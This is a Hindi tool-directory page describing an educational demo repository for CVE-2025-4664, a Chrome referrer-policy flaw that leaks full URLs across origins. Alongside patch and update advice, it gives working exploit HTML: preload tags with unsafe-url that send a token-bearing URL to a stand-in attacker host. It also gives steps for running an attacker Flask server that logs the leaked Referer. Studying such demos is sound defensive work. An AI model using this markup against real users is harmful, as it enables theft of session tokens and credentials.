Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/speinador/cve-2025-4664
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनाफिशिंगवेब सुरक्षालर्निंग और शिक्षा
GitHubspeinador/cve-2025-4664

CVE-2025-4664

CVE-2025-4664 का शैक्षिक डेमो, एक Chrome लोडर कमजोरी जो रेफरर-पॉलिसी में हेरफेर के माध्यम से क्रॉस-ओरिजिन डेटा लीकेज को सक्षम करती है। इसमें हाथों-हाथ शोषण सिमुलेशन के लिए एक पीड़ित HTML पृष्ठ और हमलावर Flask सर्वर शामिल है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔒 भेद्यता CVE-2025-4664

CVE-2025-4664 भेद्यता Google Chrome के Loader घटक में पहचाना गया एक उच्च-गंभीरता वाला सुरक्षा दोष है, जो संस्करण 136.0.7103.113 से पहले के संस्करणों में मौजूद है। यह समस्या एक दूरस्थ हमलावर को विशेष रूप से डिज़ाइन किए गए HTML पृष्ठ के माध्यम से क्रॉस-ऑरिजिन डेटा को लीक करने की अनुमति देती है, जो सत्र टोकन या प्रमाणीकरण क्रेडेंशियल जैसी संवेदनशील जानकारी से समझौता कर सकती है।


❓ यह भेद्यता क्या है?

यह दोष Chrome के Loader घटक में सुरक्षा नीतियों के अनुचित कार्यान्वयन में निहित है। विशेष रूप से, Chrome उप-संसाधन अनुरोधों (जैसे छवियाँ या स्क्रिप्ट) में HTTP हेडर Link के भीतर referrer-policy निर्देश की व्याख्या करता है, भले ही अन्य ब्राउज़र ऐसा न करें। एक हमलावर unsafe-url जैसी कम प्रतिबंधात्मक नीति सेट करके इसका फायदा उठा सकता है, जिससे Chrome पूर्ण URL (संवेदनशील पैरामीटर सहित) को हमलावर-नियंत्रित डोमेन पर लीक कर देता है।


⚠️ प्रभाव और सक्रिय शोषण

इस भेद्यता का वास्तविक वातावरण में सक्रिय रूप से शोषण किया गया है, जिसके कारण अमेरिकी साइबर सुरक्षा और बुनियादी ढांचा सुरक्षा एजेंसी (CISA) ने इसे अपने ज्ञात और शोषित भेद्यताओं की सूची (KEV) में शामिल किया है। CISA ने संघीय एजेंसियों के लिए संबंधित सुधार लागू करने की अंतिम तिथि 5 जून 2025 निर्धारित की है।


🛡️ शमन और सिफारिशें

Google ने इस भेद्यता को ठीक करने के लिए निम्नलिखित संस्करणों में अद्यतन जारी किए हैं:

  • 🖥️ Windows और Mac: 136.0.7103.113/.114
  • 🐧 Linux: 136.0.7103.113

सभी उपयोगकर्ताओं को दृढ़ता से सलाह दी जाती है कि वे अपने Chrome ब्राउज़र को उपलब्ध नवीनतम संस्करण में अपडेट करें। अद्यतन की जाँच और लागू करने के लिए:

  1. 🔍 Chrome खोलें और ऊपरी दाएँ कोने में तीन बिंदुओं वाले मेनू पर क्लिक करें।
  2. ⚙️ "सहायता" चुनें और फिर "Google Chrome के बारे में" चुनें।
  3. ⬇️ Chrome स्वचालित रूप से अद्यतन खोजेगा और यदि उपलब्ध हों तो उन्हें स्थापित करेगा।
  4. 🔄 अद्यतन के बाद, परिवर्तन लागू करने के लिए ब्राउज़र को पुनः आरंभ करें।

इसके अलावा, Microsoft Edge, Brave, Opera और Vivaldi जैसे Chromium-आधारित ब्राउज़रों के उपयोगकर्ताओं को संबंधित अद्यतनों पर नज़र रखनी चाहिए, क्योंकि वे इस भेद्यता से प्रभावित हो सकते हैं।

ब्राउज़र को अद्यतन रखना सक्रिय सुरक्षा खतरों से बचाव और व्यक्तिगत जानकारी की सुरक्षा के लिए आवश्यक है।


🕵️‍♂️ इसका शोषण कैसे किया जाता है?

भेद्यता CVE-2025-4664 का शोषण Google Chrome द्वारा HTML लिंक से उप-संसाधन (जैसे छवियाँ, स्क्रिप्ट आदि) लोड करते समय संदर्भ नीति (referrer-policy) को संभालने के तरीके में हेरफेर करके किया जाता है।


⚙️ तकनीकी रूप से शोषण कैसे काम करता है:

  1. 🌐 दुर्भावनापूर्ण साइट का निर्माण:
    हमलावर एक वेबसाइट बनाता है जो अपने HTTP हेडर में इस तरह का एक HTML लिंक शामिल करती है:

    root@kitploit:~
    <link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
    
  2. 🔧 referrer-policy में हेरफेर: अधिकांश ब्राउज़रों में, टैग में यह referrerpolicy लोड किए गए संसाधन पर लागू नहीं होता है। हालाँकि, Chrome इसे लागू करता है, जो समस्या का मूल कारण है।

  3. 📤 Referer का लीक होना: जब पीड़ित का ब्राउज़र (Chrome) victima.com से संसाधन लोड करता है, तो वह मूल साइट की पूरी URL को Referer हेडर के रूप में भेजता है, जिसमें शामिल हो सकता है:

  • सत्र टोकन (?token=ABC123)
  • संवेदनशील पैरामीटर (?user=admin&password=1234)
  • निजी URL
  1. 🎯 हमलावर के सर्वर पर प्राप्ति: हमलावर संसाधन के गंतव्य को अपने नियंत्रण वाले URL पर सेट कर सकता है, उदाहरण के लिए:
root@kitploit:~
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">

जब पीड़ित इस संसाधन तक पहुँचता है, Chrome अपनी पूरी URL को Referer के रूप में हमलावर के सर्वर पर भेजता है।

  1. 🕵️ जानकारी की चोरी: हमलावर का सर्वर HTTP हेडर को लॉग करता है, और पीड़ित की URL की पूरी सामग्री प्राप्त करता है। इसमें गोपनीय डेटा, एक्सेस टोकन या यहाँ तक कि आंतरिक API के URL भी शामिल हो सकते हैं।

✔️ कार्य करने के लिए आवश्यक शर्तें:

  • 👤 पीड़ित बिना पैच किए Google Chrome का उपयोग करता है।
  • 🔑 पीड़ित की साइट URL में संवेदनशील जानकारी (जैसे प्रमाणीकरण टोकन) शामिल करती है।
  • 🎣 हमलावर पीड़ित के ब्राउज़र को अपने डोमेन से एक संसाधन लोड करने में सफल होता है (उदाहरण के लिए, फ़िशिंग, एक दुर्भावनापूर्ण विज्ञापन, या रीडायरेक्ट के माध्यम से)।

🧪 हमले का व्यावहारिक उदाहरण (सरलीकृत):

1- हमलावर पीड़ित को एक लिंक भेजता है:

root@kitploit:~
https://atacante.com/pagina-maliciosa.html
  1. उस पृष्ठ पर कुछ इस तरह लोड होता है:
root@kitploit:~
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
  1. Chrome ब्राउज़र भेजता है:
root@kitploit:~
Referer: https://victima.com/perfil?token=ABC123

हमलावर डोमेन पर, टोकन को उजागर करते हुए।

Foto de perfil

प्रोजेक्ट फ़ाइलें

🖥️ index.html — पीड़ित फ़ाइल

यह फ़ाइल हमले के पीड़ित का अनुकरण करती है, यह एक सरलीकृत HTML डेमो है जो दिखाती है कि दुर्भावनापूर्ण टैग का उपयोग करके CVE-2025-4664 भेद्यता का शोषण कैसे किया जा सकता है:

  • यह कमजोर इंटरफ़ेस का प्रतिनिधित्व करता है।
  • इसका उपयोग नियंत्रित वातावरण में भेद्यता के काम करने के तरीके को प्रदर्शित करने के लिए किया जाता है।
  • इसमें ऐसे तत्व शामिल हैं जिनका शोषण हमलावर CVE-2025-4664 के अनुसार कर सकता है।
root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- यह संसाधन URL में संवेदनशील जानकारी वाली पीड़ित साइट की ओर इशारा करता है -->
  <link rel="preload" as="image"
        href="https://victima.com/perfil?token=ABC123"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
  <p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>

यह कोड क्या करता है:

  • टैग को victima.com से एक छवि को URL में टोकन के साथ प्रीलोड करने के लिए कॉन्फ़िगर किया गया है।
  • referrerpolicy="unsafe-url" के साथ, Chrome वर्तमान पृष्ठ की पूरी URL को पीड़ित डोमेन पर Referer के रूप में भेजेगा।
  • यदि छवि हमलावर के अपने सर्वर की ओर इशारा करती है तो हमलावर उस पूर्ण URL को अपने लॉग में कैप्चर कर सकता है।

🐍 servidor_atacante.py — हमलावर फ़ाइल

इस स्क्रिप्ट से Python में एक छोटे सर्वर का उपयोग करके Referer को कैप्चर करने के लिए हमले को स्वचालित करना संभव है। यहाँ हमलावर सर्वर का अनुकरण करने के लिए Flask का उपयोग करके एक उदाहरण दिया गया है जो डेटा प्राप्त करता है:

  • index.html द्वारा दर्शाए गए पीड़ित के विरुद्ध हमले का अनुकरण करता है।
  • भेद्यता में वर्णित तकनीकों को लागू करता है।
  • इसका उपयोग लागू शमन का परीक्षण और सत्यापन करने के लिए किया जाता है।

इसका उपयोग कैसे करें:

  1. उस कोड को servidor_atacante.py के रूप में सहेजें।
  2. यदि Flask स्थापित नहीं है तो उसे स्थापित करें:
root@kitploit:~
pip install flask
  1. सर्वर चलाएँ:
root@kitploit:~
python servidor_atacante.py
  1. फिर HTML डेमो को इस प्रकार संशोधित करें:
root@kitploit:~
<link rel="preload" as="image"
      href="http://<tu_IP>:8080/captura.jpg"
      referrerpolicy="unsafe-url">

<tu_IP> को उस सर्वर के सार्वजनिक या स्थानीय IP से बदलें जो स्क्रिप्ट चला रहा है।


💪 प्रोजेक्ट का उपयोग कैसे करें

🛠️ 1. Flask सर्वर चलाएँ

  1. एक टर्मिनल (PowerShell या CMD) खोलें।

  2. फ़ाइल फ़ोल्डर पर नेविगेट करें:

root@kitploit:~
cd "C:\Users\Sebas\Desktop\servidor_atacante"
  1. Flask चलाएँ:
root@kitploit:~
python servidor_atacante.py
  1. आप कुछ इस तरह देखेंगे:
root@kitploit:~
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080

🌐 2. index.html बनाएँ और खोलें (पीड़ित का अनुकरण)

उसी फ़ोल्डर (C:\Users\Sebas\Desktop\servidor_atacante) में, इस सामग्री के साथ index.html नामक एक फ़ाइल बनाएँ:

root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- हमले का अनुकरण करता है -->
  <link rel="preload" as="image"
        href="http://192.168.1.35:8080/captura.jpg"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Simulación CVE-2025-4664</h1>
  <p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>

✅ महत्वपूर्ण: सुनिश्चित करें कि IP (192.168.1.35) Flask द्वारा दिखाए गए स्थानीय IP से मेल खाता है। यदि अलग है, तो HTML में उसे बदलें।

🚀 3. संवेदनशील पैरामीटर के साथ index.html खोलें

  1. Chrome खोलें।

  2. एड्रेस बार में टाइप करें:

root@kitploit:~
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
  1. Enter दबाएँ।

  2. 📥 सर्वर पर परिणाम देखें Flask कंसोल में आपको कुछ इस तरह दिखना चाहिए:

root@kitploit:~
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123

[Carpeta destino]: इस पैरामीटर को उस स्थान से बदलें जहाँ हमने फ़ाइल सहेजी है।

🎯 इसका मतलब है कि ब्राउज़र ने पूरा Referer हमलावर को भेज दिया!


🧑‍🏫 लेखक

यह व्याख्या Sebastian Peinador द्वारा शैक्षिक और आक्रामक साइबर सुरक्षा अनुसंधान उद्देश्यों के लिए तैयार की गई है।


📄 लाइसेंस

यह सामग्री MIT लाइसेंस के तहत वितरित की जाती है।


यदि यह उपयोगी लगे, तो रेपो को ⭐ देना या इसे साझा करना न भूलें!

टूल डाउनलोड करें